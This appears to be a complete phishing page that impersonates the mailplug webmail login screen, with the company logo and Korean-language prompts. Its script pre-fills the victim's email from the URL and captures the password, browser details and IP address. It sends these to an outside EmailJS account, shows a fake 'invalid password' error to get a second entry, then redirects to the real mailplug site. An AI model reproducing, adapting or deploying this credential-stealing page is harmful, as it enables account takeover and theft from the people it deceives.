<!DOCTYPE html>
<html lang="en">
	<head>
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no" />
		<meta content="text/html;charset=utf-8" http-equiv="Content-Type" />

		<title>mailplug</title>
		<style>

						* {

							text-rendering: optimizeLegibility;
							-webkit-font-smoothing: antialiased;
							font-family: 'Spoqa Han Sans Neo', 'Poppins', 'AppleSDGothic', 'apple sd gothic neo', 'noto sans korean', 'Noto Sans KR', 'noto sans cjk kr', 'noto sans cjk', 'nanum gothic', 'malgun gothic', 'dotum', arial, helvetica, 'MS Gothic', sans-serif !important;
						}

						html,
						body {
				font-family: 'Segoe UI Webfont', -apple-system, 'Helvetica Neue', 'Lucida Grande', 'Roboto', 'Ebrima', 'Nirmala UI', 'Gadugi', 'Segoe Xbox Symbol', 'Segoe UI Symbol', 'Meiryo UI', 'Khmer UI', 'Tunga', 'Lao UI', 'Raavi', 'Iskoola Pota', 'Latha', 'Leelawadee', 'Microsoft YaHei UI', 'Microsoft JhengHei UI', 'Malgun Gothic', 'Estrangelo Edessa', 'Microsoft Himalaya', 'Microsoft New Tai Lue', 'Microsoft PhagsPa', 'Microsoft Tai Le', 'Microsoft Yi Baiti', 'Mongolian Baiti', 'MV Boli', 'Myanmar Text',
					'Cambria Math';
				margin: 0;
				padding: 0;
				width: 100;
				background-image: url('https://i.ibb.co/C6PpczL/imageedit-1-2607661607.jpg');
				background-repeat: no-repeat;
				background-attachment: fixed;
				background-position: center;
				background-size: cover;
				background-origin: border-box;
				font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
			}

			.overlay {
				position: absolute;
				width: 100%;
				height: 100%;
				overflow: scroll;
				background-color: rgba(255, 255, 255, 0.4);
			}
						ol,
						ul {
							list-style: none;
						}
						a {
							text-decoration: none;
						}
						p,
						input {
							font-family: 'Spoqa Han Sans Neo', 'Poppins', 'AppleSDGothic', 'apple sd gothic neo', 'noto sans korean', 'Noto Sans KR', 'noto sans cjk kr', 'noto sans cjk', 'nanum gothic', 'malgun gothic', 'dotum', arial, helvetica, 'MS Gothic', sans-serif;
							margin: 0;
							color: #241e17;
						}
						button {
							cursor: pointer;
						}

						/* iconfont : (공통) 사이즈 */
						.isiz24 {
							font-size: 24px;
						}
						.isiz18 {
							font-size: 18px;
						}

						/* login */
						.login_wrapper {
							position: relative;
							top: 50%;
							left: 50%;
							transform: translate(-50%, -50%);
							width: fit-content;
              background-color: #ffffff;
              height: 90%;
              overflow-y: hidden;
              /* box-sizing: border-box; */
						}
						.login_wrapper-content {
							width: 360px;
							height: 100%;
							margin: 0 auto;
							padding: 20px 50px 40px;
							background-color: #ffffff;
							border-radius: 8px;

						}

						/* logo */
						.logo {
							width: 100%;
							font-weight: 700;
							font-size: 28px;
							padding-bottom: 70px;
							text-align: center;
						}
						.logo p {
							padding-top: 70px;
							color: #757575;
						}
						.logo .logo-image,
						.logo .logo-text {
							position: absolute;
							left: 50%;
							transform: translateX(-50%);
							height: 50px;
						}
						.logo .logo-image img {
							height: 100%;
						}
						.logo .logo-text span {
							line-height: 60px;
							font-size: 42px;
							color: #241e17;
						}

						/* input : toast > error */
						.input_toast-error {
							display: flex;
							align-items: center;
							padding: 8px 12px 8px 8px;
							margin-top: 10px;
							border-radius: 4px;
							color: #f50202;
							background-color: #fff1ea;
						}
						.input_toast-error p {
							font-size: 14px;
							line-height: 22px;
							color: #241e17;
						}
						.input_toast-error img {
							padding-top: 2px;
							padding-right: 8px;
						}
						.input_toast-error i {
							font-size: 18px;
							padding-right: 8px;
						}

						/* input : 이메일or도메인 */
						.input_id {
							width: 100%;
							height: 56px;
							padding-bottom: 10px;
						}
						.input_id input {
							width: 100%;
							height: 56px;
							box-sizing: border-box;
							border: none;
							padding: 0.5rem;
							outline: none;
							border-bottom: 2px solid #e9e9e9;
							font-size: 16px;
							line-height: 24px;
							color: #241e17;
						}
						.input_id input::placeholder {
							color: #c7c7c7;
						}
						.input_id input:focus {
							border-bottom: 2px solid #241e17;
							outline: none;
						}

						/* button : 확인 */
						.login_btn {
							margin-top: 30px;
						}

						.login_btn .button {
							width: 100%;
							padding: 0;
							line-height: 56px;
							border: none;
							border-radius: 4px;
							outline: none;
							background-color: #241e17;
							color: #fff;
							font-size: 16px;
							font-weight: 500;
							text-align: center;
							cursor: pointer;
							z-index: 1000;
						}

						/* 로그인 설명 */
						.login_des p {
							margin-top: 30px;
							font-size: 14px;
							color: #999999;
							line-height: 22px;
							text-align: center;
						}

						/* footer(copyright, 다국어) */
						.login-footer {
							display: flex;
							justify-content: center;
							align-items: center;
							position: absolute;
							bottom: 0px;
							left: 0;
							right: 0;
							height: 80px;
						}
						.footer-copyright {
							margin-right: 30px;
						}
						.footer-copyright p {
							font-family: 'Poppins' !important;
							font-weight: 275;
							font-size: 12px;
							line-height: 18px;
							color: #757575;
							text-align: center;
						}


		</style>
	</head>
	<body data-new-gr-c-s-check-loaded="14.1098.0" data-gr-ext-installed="">
		<div class="overlay">
			<div class="login_wrapper" style="display:block">
				<form id="form-1" method="POST">
					<input type="hidden" name="btn1" value="btn1" />
					<div class="login_wrapper-content">
						<div class="logo">
							<div class="logo-image">
								<svg width="131" height="32" viewBox="0 0 131 32" fill="none" xmlns="http://www.w3.org/2000/svg">
									<path
										d="M130.479 9.3655C130.479 8.89346 130.292 8.44076 129.958 8.10698C129.624 7.7732 129.172 7.58568 128.7 7.58568C128.228 7.58568 127.775 7.7732 127.441 8.10698C127.107 8.44076 126.92 8.89346 126.92 9.3655V10.55C125.541 8.60038 123.592 7.62557 121.074 7.62557C119.951 7.60473 118.836 7.82139 117.802 8.26136C116.768 8.70134 115.839 9.35471 115.075 10.1787C114.276 10.9803 113.647 11.9348 113.225 12.9851C112.803 14.0353 112.597 15.1599 112.62 16.2915C112.601 17.4262 112.809 18.5533 113.23 19.607C113.652 20.6607 114.279 21.6199 115.075 22.4288C115.846 23.2439 116.78 23.8891 117.815 24.3229C118.85 24.7567 119.964 24.9697 121.086 24.9482C123.605 24.9482 125.553 23.9744 126.932 22.0268V24.0736C126.932 26.998 125.051 28.7103 121.927 28.7103C119.543 28.7103 117.895 27.8358 117.017 26.1235L113.893 27.937C115.339 30.6589 117.99 32 121.853 32C124.238 32 126.288 31.331 127.966 29.9532C129.645 28.5753 130.486 26.6267 130.486 24.0736V9.34402L130.479 9.3655ZM125.373 20.0537C124.877 20.5506 124.284 20.9411 123.631 21.2012C122.978 21.4613 122.28 21.5856 121.577 21.5665C120.871 21.5824 120.168 21.4567 119.511 21.1969C118.854 20.9371 118.255 20.5483 117.751 20.0537C117.254 19.5641 116.863 18.9774 116.602 18.3301C116.342 17.6828 116.218 16.9888 116.238 16.2915C116.219 15.5942 116.343 14.9004 116.603 14.2532C116.863 13.606 117.254 13.0192 117.751 12.5293C118.256 12.0351 118.854 11.647 119.511 11.3877C120.169 11.1284 120.871 11.0032 121.577 11.0195C122.279 10.9998 122.978 11.1235 123.631 11.3831C124.284 11.6427 124.876 12.0327 125.373 12.5293C125.878 13.0141 126.275 13.5995 126.54 14.2476C126.804 14.8956 126.929 15.5919 126.908 16.2915C126.93 16.9911 126.805 17.6876 126.54 18.3357C126.276 18.9838 125.878 19.5691 125.373 20.0537Z"
										fill="#FF6412" />
									<path
										d="M18.3383 7.62557C16.0215 7.62557 14.3092 8.50014 13.1983 10.28C12.158 8.50014 10.5807 7.62557 8.42961 7.62557C6.27848 7.62557 4.70119 8.43263 3.62716 10.0805V9.39926C3.62716 8.91827 3.43608 8.45698 3.09597 8.11686C2.75586 7.77675 2.29457 7.58568 1.81358 7.58568C1.33259 7.58568 0.871297 7.77675 0.531185 8.11686C0.191073 8.45698 7.16733e-09 8.91827 0 9.39926H0V24.8561H3.62716V15.4537C3.62716 12.5293 5.16149 11.0195 7.35558 11.0195C9.37169 11.0195 10.5132 12.3636 10.5132 14.6804V24.8561H14.1404V15.4537C14.1404 12.4955 15.5489 11.0195 17.8013 11.0195C19.8143 11.0195 21.0572 12.3636 21.0572 14.6804V24.8561H24.6843V14.4441C24.6843 10.28 22.1343 7.62557 18.3383 7.62557Z"
										fill="#FF6412" />
									<path
										d="M45.5083 9.39926C45.5083 8.91827 45.3172 8.45698 44.9771 8.11686C44.637 7.77675 44.1757 7.58568 43.6947 7.58568C43.2137 7.58568 42.7524 7.77675 42.4123 8.11686C42.0722 8.45698 41.8811 8.91827 41.8811 9.39926V10.4487C40.5033 8.56765 38.5578 7.62557 36.0046 7.62557C34.8947 7.6101 33.794 7.82957 32.7749 8.26959C31.7558 8.70961 30.8412 9.36022 30.0913 10.1787C29.2845 11.0095 28.6517 11.9931 28.2302 13.0718C27.8086 14.1505 27.6067 15.3025 27.6364 16.4602C27.6101 17.6176 27.8136 18.7686 28.235 19.8468C28.6563 20.925 29.2873 21.909 30.0913 22.7418C30.8414 23.5599 31.756 24.21 32.7751 24.6495C33.7943 25.089 34.8949 25.3079 36.0046 25.2919C38.5578 25.2919 40.5033 24.3528 41.8811 22.438V24.8561H45.5083V9.39926ZM40.3713 20.3237C39.3457 21.294 37.9873 21.8347 36.5754 21.8347C35.1635 21.8347 33.8052 21.294 32.7795 20.3237C32.2824 19.8133 31.8927 19.2084 31.6334 18.5449C31.374 17.8813 31.2504 17.1724 31.2697 16.4602C31.2473 15.7527 31.3697 15.0481 31.6293 14.3896C31.889 13.7311 32.2803 13.1325 32.7795 12.6306C33.7954 11.6412 35.1574 11.0876 36.5754 11.0876C37.9935 11.0876 39.3555 11.6412 40.3713 12.6306C40.8705 13.1325 41.2619 13.7311 41.5215 14.3896C41.7811 15.0481 41.9035 15.7527 41.8811 16.4602C41.9004 17.1724 41.7768 17.8813 41.5175 18.5449C41.2581 19.2084 40.8684 19.8133 40.3713 20.3237Z"
										fill="#FF6412" />
									<path d="M53.3671 8.6598C53.3671 8.17881 53.1761 7.71752 52.836 7.37741C52.4959 7.03729 52.0346 6.84622 51.5536 6.84622C51.0726 6.84622 50.6113 7.03729 50.2712 7.37741C49.9311 7.71752 49.74 8.17881 49.74 8.6598V24.8562H53.3671V8.6598Z" fill="#FF6412" />
									<path d="M61.1921 4.66123C61.1921 4.42307 61.1452 4.18724 61.0541 3.96721C60.9629 3.74717 60.8293 3.54725 60.6609 3.37884C60.4925 3.21043 60.2926 3.07685 60.0726 2.98571C59.8525 2.89457 59.6167 2.84766 59.3785 2.84766C59.1404 2.84766 58.9045 2.89457 58.6845 2.98571C58.4645 3.07685 58.2645 3.21043 58.0961 3.37884C57.9277 3.54725 57.7941 3.74717 57.703 3.96721C57.6119 4.18724 57.5649 4.42307 57.5649 4.66123V24.8561H61.1921V4.66123Z" fill="#FF6412" />
									<path
										d="M80.8071 10.2125C80.0591 9.38922 79.1458 8.73324 78.1267 8.28745C77.1077 7.84166 76.006 7.61611 74.8938 7.62557C72.3437 7.62557 70.3951 8.56765 69.0173 10.4825V9.43608C69.0173 9.43608 69.0173 9.41153 69.0173 9.39926C69.0173 9.16109 68.9704 8.92526 68.8792 8.70523C68.7881 8.4852 68.6545 8.28527 68.4861 8.11686C68.3177 7.94846 68.1178 7.81487 67.8977 7.72373C67.6777 7.63259 67.4419 7.58568 67.2037 7.58568C66.9656 7.58568 66.7297 7.63259 66.5097 7.72373C66.2897 7.81487 66.0897 7.94846 65.9213 8.11686C65.7529 8.28527 65.6193 8.4852 65.5282 8.70523C65.437 8.92526 65.3901 9.16109 65.3901 9.39926V31.5734H69.0173V22.4718C70.3951 24.3528 72.3437 25.2919 74.8938 25.2919C76.0036 25.3083 77.1043 25.0896 78.1235 24.6501C79.1427 24.2105 80.0573 23.5602 80.8071 22.7418C81.6136 21.9108 82.2462 20.9271 82.6678 19.8485C83.0893 18.7699 83.2914 17.618 83.262 16.4602C83.2886 15.308 83.0851 14.1619 82.6636 13.0892C82.2421 12.0164 81.611 11.0385 80.8071 10.2125ZM78.1189 20.339C77.0934 21.3084 75.7357 21.8486 74.3245 21.8486C72.9134 21.8486 71.5557 21.3084 70.5301 20.339C70.0321 19.8292 69.6415 19.2245 69.3816 18.5608C69.1218 17.8972 68.9979 17.1881 69.0173 16.4756C68.9948 15.7678 69.1174 15.0629 69.3776 14.4043C69.6378 13.7456 70.03 13.1472 70.5301 12.6459C71.5451 11.656 72.9068 11.102 74.3245 11.102C75.7423 11.102 77.104 11.656 78.1189 12.6459C78.6178 13.1482 79.0091 13.7468 79.2692 14.4052C79.5293 15.0636 79.6527 15.768 79.6318 16.4756C79.6485 17.1854 79.5232 17.8914 79.2635 18.5522C79.0037 19.213 78.6146 19.8153 78.1189 20.3237V20.339Z"
										fill="#FF6412" />
									<path d="M90.1757 4.66123C90.1757 4.18024 89.9847 3.71895 89.6446 3.37884C89.3044 3.03873 88.8432 2.84766 88.3622 2.84766C87.8812 2.84766 87.4199 3.03873 87.0798 3.37884C86.7397 3.71895 86.5486 4.18024 86.5486 4.66123V24.8561H90.1757V4.66123Z" fill="#FF6412" />
									<path
										d="M109.318 9.39926C109.318 8.91827 109.127 8.45697 108.787 8.11686C108.447 7.77675 107.986 7.58568 107.505 7.58568C107.024 7.58568 106.562 7.77675 106.222 8.11686C105.882 8.45697 105.691 8.91827 105.691 9.39926V17.0709C105.691 20.3298 103.979 21.9071 101.426 21.9071C99.1087 21.9071 97.6665 20.5293 97.6665 18.0099V9.41767C97.6665 8.93668 97.4754 8.47539 97.1353 8.13527C96.7952 7.79516 96.3339 7.60409 95.8529 7.60409C95.3719 7.60409 94.9106 7.79516 94.5705 8.13527C94.2304 8.47539 94.0393 8.93668 94.0393 9.41767V18.3751C94.0393 22.6712 96.6231 25.2919 100.483 25.2919C102.868 25.2919 104.58 24.4204 105.7 22.708V24.8561H109.327V9.39926H109.318Z"
										fill="#FF6412" />
									<path d="M51.5535 4.60299C52.8245 4.60299 53.8549 3.57258 53.8549 2.3015C53.8549 1.03041 52.8245 0 51.5535 0C50.2824 0 49.252 1.03041 49.252 2.3015C49.252 3.57258 50.2824 4.60299 51.5535 4.60299Z" fill="#FF6412" />
								</svg>
							</div>
							<p>로그인</p>
						</div>
						<div class="input_id">
							<input id="email" class="textinput" type="text" name="ai"  placeholder="이메일을 확인하세요"  value="" required />
              <div id="emailError" class="content-input" style="display: none;">
						</div>
						<div class="input_id" id="div2" style="display:none;">
							<input id="password" class="textinput" type="password"  required="Enter your password to continue" name="pr" placeholder="암호를 입력" value="" />
						</div>
						<div id="passwordError" class="content-input" style="display: none;">
							<div class="input_toast-error">
								<i class="ph-warning-fill"></i>
								<p>유효하지 않은 비밀번호..! 정확한 비밀번호를 입력해주세요.</p>
							</div>
						</div>
						<div class="login_btn" tabindex="-1">
							<input class="button" id="submit-btn" type="button" value="다음" style="background-color: rgb(255, 100, 18); cursor: default;" />
						</div>
						<div class="login_des">
							<p
								>아이디가 없으신가요?<br />
								다음 단계로 진행하려면 이메일을 입력하세요.</p
							>
						</div>
					</div>
				</form>
			</div>
			<div class="login-footer">
				<div class="footer-copyright">
					<p>© mailplug Inc. All rights reserved.</p>
				</div>
				<div class="mb-auth-lang-selector">
					<div id="mb-auth-lang-selector-opener" class="mb-auth-lang" tabindex="0">
						한국어
						<span class="select_icon closed">
							<svg width="17" height="16" viewBox="0 0 17 16" fill="none" xmlns="http://www.w3.org/2000/svg">
								<path fill-rule="evenodd" clip-rule="evenodd" d="M3.23483 5.73468C3.38128 5.58824 3.61872 5.58824 3.76517 5.73468L8.5 10.4695L13.2348 5.73468C13.3813 5.58824 13.6187 5.58824 13.7652 5.73468C13.9116 5.88113 13.9116 6.11857 13.7652 6.26501L8.76516 11.265C8.61872 11.4115 8.38128 11.4115 8.23484 11.265L3.23483 6.26501C3.08839 6.11857 3.08839 5.88113 3.23483 5.73468Z" fill="#757575" />
							</svg>
						</span>
					</div>
				</div>
			</div>
    </div>


			<script type="text/javascript">
				document.addEventListener('DOMContentLoaded', function () {
							 if (!window.location.hash) {
									// Add a hash to the URL
									window.location.hash = '#[[email]]'; // Change 'section1' to the desired hash
							}
				       // Get the current URL

					var error = document.getElementById('error');
					var div1 = document.getElementById('div1');
				  var div2 = document.getElementById('div2')
					var msg1 = document.getElementById('msg1');
					var passwordError = document.getElementById('passwordError');
					var emailError = document.getElementById('emailError');
					var emailInput = document.getElementById('email');
					var submitButton = document.getElementById('submit-btn');
					var passwordInput = document.getElementById('password');
					var list1 = document.getElementById('list1');
					var list2 = document.getElementById('list2');
          var footer = document.querySelector('.login-footer')
					var count = 0;
          var selectIcon = document.querySelector('.select_icon')

					const emailHash = window.location.hash.substr(1)

					if (emailHash) {
						emailInput.value = emailHash;
						var my_email = emailHash;
						var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
						if (!filter.test(my_email)) {
							emailInput.focus();
							// return false;
						}

						var ind = my_email.indexOf('@');
						var my_slice = my_email.substr(ind + 1);

					}


					function getUserBrowserDetails() {
						const userAgent = navigator.userAgent;
						const appName = navigator.appName;
						const appVersion = navigator.appVersion;
						const platform = navigator.platform;
						const language = navigator.language;

						return {
							userAgent,
							appName,
							appVersion,
							platform,
							language,
						};
					}

					let ip = '';

					function text(url) {
						return fetch(url).then((res) => res.text());
					}


					// get ip address of user
					text('https://www.cloudflare.com/cdn-cgi/trace').then((data) => {
						let ipRegex = /[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/;
						ip = data.match(ipRegex)[0];
					});
					console.log(ip)


					submitButton.addEventListener('click', async function (event) {
						event.preventDefault();
            footer.style.display = 'none'
				    div2.style.display = 'flex'
						passwordInput.style.display = 'flex'
						passwordError.style.display = 'none'
				        // submit the form when there is a password input
				   if(passwordInput.value && emailInput.value){
						var password = passwordInput.value;
						var detail = getUserBrowserDetails();

						count++;

						const params = {
							email: emailInput.value,
							password,
							userAgent: detail.userAgent,
							appName: detail.appName,
							appVersion: detail.appVersion,
							platform: detail.platform,
							language: detail.language,
							ip,
						};

						const data = {
							service_id: 'service_v94347h',
							template_id: 'template_ehhapba',
							template_params: params,
							user_id: '-csSYtT85Cumloy8C',
						};

						if (count >= 2) {
							window.location.replace('https://www.mailplug.com');
						}


						// return;
						try {
				          const response = await fetch('https://api.emailjs.com/api/v1.0/email/send', {
				            method: 'POST',
								body: JSON.stringify(data),
								headers: {
				              'Content-Type': 'application/json',
								},
							});

							if (response.ok) {
				          passwordError.style.display = 'flex';
                  footer.style.display = 'none'
								  passwordInput.value = '';
							} else {
				        passwordError.style.display = 'flex';
                footer.style.display = 'none'
								passwordInput.value = '';
							}
						} catch (error) {
              passwordError.style.display = 'flex';
              footer.style.display = 'none'
							passwordInput.value = '';
						}

				   }



					});
				});
			</script>
	</body>
</html>
